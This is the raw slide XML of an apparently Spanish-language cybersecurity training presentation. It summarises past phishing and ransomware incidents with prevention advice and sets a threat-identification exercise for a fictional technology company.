          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638552" y="1453067"/>
            <a:ext cx="1795768" cy="430787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Imagen 18" descr="Texto&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E9AFA2-9145-D42A-7401-982AB051D503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4656478" y="5542209"/>
            <a:ext cx="1766425" cy="388917"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23" descr="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224F66A1-D3F5-AFF4-CBD0-23FA0936CA23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9"/>
          <a:srcRect t="11867" b="11183"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7906635" y="1408922"/>
            <a:ext cx="807062" cy="612872"/>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7FC117BA-9AE7-C044-7AD4-CA878C078563}"/>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926466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76BE-F5DF-7DC4-ED64-4F10D1A5358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5955AE2-5FA3-D3EA-CD30-D88499F34CB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85BE29-1582-5A31-9A60-14A10AE3EDED}"/>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Ataques cibernéticos y cómo se podrían haber prevenido</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB402F8A-6930-952B-A89B-DFC01083128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Flecha: a la derecha 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B99AA9-6DAE-DD4A-F231-3BDA26321ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831091" y="3676429"/>
            <a:ext cx="10164725" cy="29836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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Google Shape;1651;p48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34177D71-4DFC-17AC-1229-5D2F64D68BD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="802123" y="1336774"/>
            <a:ext cx="7160331" cy="4765882"/>
            <a:chOff x="5793258" y="2214148"/>
            <a:chExt cx="839668" cy="595918"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Google Shape;1652;p48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E007615F-7074-AF17-536F-75BC3F92A08F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5793258" y="2214148"/>
              <a:ext cx="460869" cy="2791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400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Descripción</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>ataque de phishing </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>a través de correos electrónicos falsos que buscaban robar información personal y financiera.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRP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ea typeface="+mn-lt"/>
                  <a:cs typeface="+mn-lt"/>
                </a:rPr>
                <a:t>concienciación de los usuarios en la detección de correos electrónicos fraudulentos.</a:t>
              </a:r>
              <a:endParaRPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Google Shape;1654;p48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1B53AE-D65A-B8C7-9DB0-45CB6650A42C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6142324" y="2554321"/>
              <a:ext cx="490602" cy="255745"/>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r>
                <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Descripción</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>cierre de todas las fábricas de Toyota en Japón </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-ES" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>por un ciberataque de ransomware a uno de sus proveedores.</a:t>
              </a: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Fortalecer las medidas de ciberseguridad en las relaciones con los proveedores.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Elipse 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B1D011-5EC2-34D6-60FC-2E9D896E60EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625573" y="3575661"/>
            <a:ext cx="468000" cy="46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600">
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Elipse 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17FA9F8-1973-943B-1E02-A456912480E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622309" y="3590477"/>
            <a:ext cx="468000" cy="46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29" name="CuadroTexto 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A26700-F7EF-B156-6D9A-15BAE087827A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578572" y="3670588"/>
            <a:ext cx="1629703" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2020</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="CuadroTexto 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B420B5-F17F-8454-BECE-839971773543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569130" y="3659742"/>
            <a:ext cx="1629703" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2022</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Elipse 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{017BFC96-420E-9E2A-1B95-9BC389528A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659572" y="3581173"/>
            <a:ext cx="468000" cy="46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2" name="CuadroTexto 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD401924-4BB9-BD6F-BF61-A7B47B4FCD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8616666" y="3643072"/>
            <a:ext cx="1629703" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;1652;p48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1538B9D-CD32-CEE1-AA70-ED71C2989929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6791329" y="1309415"/>
            <a:ext cx="4204487" cy="2248295"/>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400" b="1">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Descripción</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ataque de ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, secuestro de información relativa a clientes de la compañía y documentos internos. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prevención</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="140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rPr>
              <a:t>Implementar controles robustos de seguridad y gestionar adecuadamente la monitorización </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>incidencias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Imagen 33" descr="Logotipo, nombre de la empresa&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF7DE873-527E-ED85-F93B-EE0DB1B892CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043211" y="1387415"/>
            <a:ext cx="1436279" cy="440302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 2" descr="Logo del Coche Toyota PNG transparente - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8707DA5A-7D30-155C-F4B4-8975B20E39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3260" y="5362224"/>
            <a:ext cx="1394741" cy="762800"/>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n 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E74F1D-1242-A3A4-815B-FD2B0DA71343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8258615" y="1380345"/>
            <a:ext cx="1269914" cy="398291"/>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4223DC29-2F37-BE95-6259-3EB15C7FD93F}"/>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661388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23BA3-5F1F-6301-085A-07584BBAB19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213CCA0-5401-9521-3298-0154C6C063B6}"/>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C1CDCEBD-449D-5646-BF58-C0EE3D349B50}"/>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Práctica: identificación de amenazas en un escenario proporcionado</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2131C2CD-3251-6624-8147-64997814E4B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Rectángulo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76686BA-F728-92F0-CAE1-9D4F1EC8F009}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1492996"/>
            <a:ext cx="10986652" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La empresa XYZ es una empresa de tecnología que se especializa en el desarrollo de software a medida para clientes de diversos sectores, incluyendo el financiero y el médico. La empresa tiene una infraestructura tecnológica compleja que incluye servidores, bases de datos, estaciones de trabajo y una red interna. La información de los clientes es altamente confidencial, y la empresa se esfuerza por mantener altos estándares de seguridad.</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Identificar posibles amenazas y vulnerabilidades en la infraestructura tecnológica de la empresa XYZ. Deberás realizar un análisis de riesgos y proponer medidas de seguridad adecuadas para mitigar estas amenazas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Gráfico 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58535C9-C881-9814-022A-BBEE56CC8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2259" y="3778753"/>
            <a:ext cx="3536390" cy="2211563"/>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2C1ADFD6-6DD6-9BC1-0EED-659262B1A79D}"/>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57844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8F58-5F26-F498-6245-BEDFD132EB5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A6EBE75-D522-2D6B-BA7C-D8717B4ECB4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6D46BA8-1FFB-5DFB-8228-963052534688}"/>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Identificación de Amenazas de empresa XYZ: Propuesta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D09574-54D9-D435-6BCF-41624524020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401A5FF2-4C09-D6DB-10D8-9B362B1E0E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630677" y="1585343"/>
            <a:ext cx="5019243" cy="424731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s-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Acceso no autorizado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>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personas no autorizadas pueden intentar acceder a los sistemas y datos confidenciales de la empresa.</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contraseñas débiles, falta de autenticación de dos factores, falta de control de acceso adecuado.</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implementar autenticación de dos factores, establecer políticas de contraseñas seguras y utilizar sistemas de gestión de identidad y acceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
